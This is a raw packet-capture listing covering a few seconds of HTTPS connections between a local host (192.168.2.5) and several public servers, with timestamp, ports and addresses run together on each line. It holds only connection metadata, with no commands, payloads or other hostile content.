                                                                                        Dec 5, 2024 22:50:28.538949966 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.538994074 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.539067030 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.539166927 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.539180994 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.546417952 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.546477079 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.546529055 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.546695948 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.546705008 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.546715975 CET49788443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.546720028 CET4434978813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.549884081 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.549907923 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.550040960 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.550189972 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.550199986 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.554635048 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.554686069 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.554728031 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.554915905 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.554923058 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.554935932 CET49787443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.554939032 CET4434978713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.558057070 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.558080912 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.558141947 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.558263063 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.558274031 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.909138918 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.909708977 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.909725904 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:28.910268068 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:28.910271883 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.344196081 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.344264984 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.344351053 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.344568968 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.344588995 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.344604969 CET49785443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.344610929 CET4434978513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.347527981 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.347573042 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.347650051 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.347780943 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:29.347794056 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.351152897 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.351350069 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.351747990 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.351826906 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.351902962 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.351953030 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.352499008 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.352550983 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356097937 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356102943 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.356122971 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356133938 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.356369019 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.356419086 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.356426001 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356465101 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356812954 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.356813908 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:29.399331093 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:29.399348021 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.249720097 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.249789953 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.249833107 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.249876976 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.249964952 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.250008106 CET44349794172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.250060081 CET49794443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.250730038 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.250788927 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.250859976 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.251924038 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.251940966 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.253485918 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.253494978 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.254139900 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.254424095 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.254435062 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.265836000 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.265902042 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.266273022 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.266294956 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.266320944 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.266484022 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.266499043 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.266882896 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.266936064 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.266958952 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.267000914 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.267194986 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.267198086 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.267229080 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.267263889 CET44349793172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.267307043 CET49793443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.267347097 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.267359972 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.267436028 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.267441988 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.267901897 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.267906904 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.268297911 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.268322945 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.268522024 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.268528938 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.268552065 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.268577099 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.268707991 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:30.268728018 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.268943071 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:30.268949986 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.273777008 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.274090052 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.274101019 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.274492979 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.274498940 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.700140953 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.700197935 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.700423002 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.700627089 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.700644016 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.700655937 CET49795443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.700661898 CET4434979513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.701514959 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.701569080 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.701616049 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.701997995 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.702014923 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.702024937 CET49796443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.702028990 CET4434979613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.702300072 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.702344894 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.702388048 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.702507019 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.702522993 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.702533960 CET49797443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.702541113 CET4434979713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704195023 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704224110 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704298019 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704492092 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704508066 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704559088 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704626083 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704638958 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704718113 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704730988 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704878092 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.704890013 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.704946041 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.705080032 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.705091000 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.708302021 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.708348989 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.708395004 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.708514929 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.708520889 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.708537102 CET49798443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.708539963 CET4434979813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.710438013 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.710464001 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:30.710535049 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.710670948 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:30.710681915 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.066771984 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.067617893 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.067631960 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.068440914 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.068444014 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.530342102 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.530405045 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.530450106 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.556842089 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.556855917 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.556866884 CET49800443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.556871891 CET4434980013.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.569776058 CET49814443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.569797039 CET4434981413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.569854021 CET49814443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.571363926 CET49814443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:31.571374893 CET4434981413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.946935892 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.947072029 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.950710058 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.950717926 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.950944901 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.950999975 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.951380968 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.956482887 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.956669092 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:31.957201958 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.957268953 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:31.959835052 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.959911108 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.960541964 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:31.960546970 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.960777998 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.960835934 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:31.961090088 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.961092949 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.961184025 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:31.961327076 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:31.961374998 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.961679935 CET49805443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:31.995340109 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.007328033 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.007337093 CET44349805142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.135401964 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.135469913 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.136042118 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.136106968 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.139890909 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.139899969 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.140125036 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.140181065 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.140533924 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.183341980 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.420216084 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.420300961 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.420502901 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.420742035 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.420757055 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.420898914 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.420923948 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.421247005 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.421252012 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.421314955 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.421319962 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.421500921 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.421513081 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.421823025 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.421828032 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.424379110 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.424599886 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.424608946 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.424892902 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.424897909 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.857023001 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.857078075 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.857186079 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.857482910 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.857501030 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.857530117 CET49808443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.857536077 CET4434980813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858102083 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858158112 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858222961 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.858819962 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.858841896 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858851910 CET49806443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.858860016 CET4434980613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858882904 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858922005 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858975887 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858985901 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.858992100 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.858997107 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859035969 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.859061003 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859065056 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.859106064 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.859149933 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.859164000 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859174967 CET49807443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.859179020 CET4434980713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859829903 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859864950 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.859914064 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.861938000 CET49804443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.861947060 CET44349804172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.862570047 CET49815443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.862585068 CET44349815172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.862646103 CET49815443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.862849951 CET49815443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:32.862864971 CET44349815172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.862987995 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.862998962 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.863009930 CET49809443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.863014936 CET4434980913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.864738941 CET49816443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.864768982 CET4434981613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.864821911 CET49816443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.864913940 CET49817443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.864948034 CET4434981713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.865012884 CET49817443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.865250111 CET49816443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.865262985 CET4434981613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.865340948 CET49817443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.865355015 CET4434981713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.866662979 CET49818443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866669893 CET4434981813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.866764069 CET49818443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866765976 CET49819443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866774082 CET4434981913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.866849899 CET49818443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866861105 CET4434981813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.866877079 CET49819443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866941929 CET49819443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:50:32.866946936 CET4434981913.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.883147001 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.883188009 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.883244038 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.883249998 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.883265972 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.883291006 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.883328915 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.883884907 CET49803443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.883889914 CET44349803142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.884354115 CET49820443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.884367943 CET44349820142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:32.884422064 CET49820443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.884711981 CET49820443192.168.2.5142.250.181.129
                                                                                        Dec 5, 2024 22:50:32.884723902 CET44349820142.250.181.129192.168.2.5
                                                                                        Dec 5, 2024 22:50:33.049371004 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:33.049443960 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.049458027 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:33.049776077 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.049845934 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.049871922 CET44349802172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:33.049952984 CET49802443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.050514936 CET49821443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.050539017 CET44349821172.217.19.238192.168.2.5
                                                                                        Dec 5, 2024 22:50:33.050632000 CET49821443192.168.2.5172.217.19.238
                                                                                        Dec 5, 2024 22:50:33.050887108 CET49821443192.168.2.5172.217.19.238
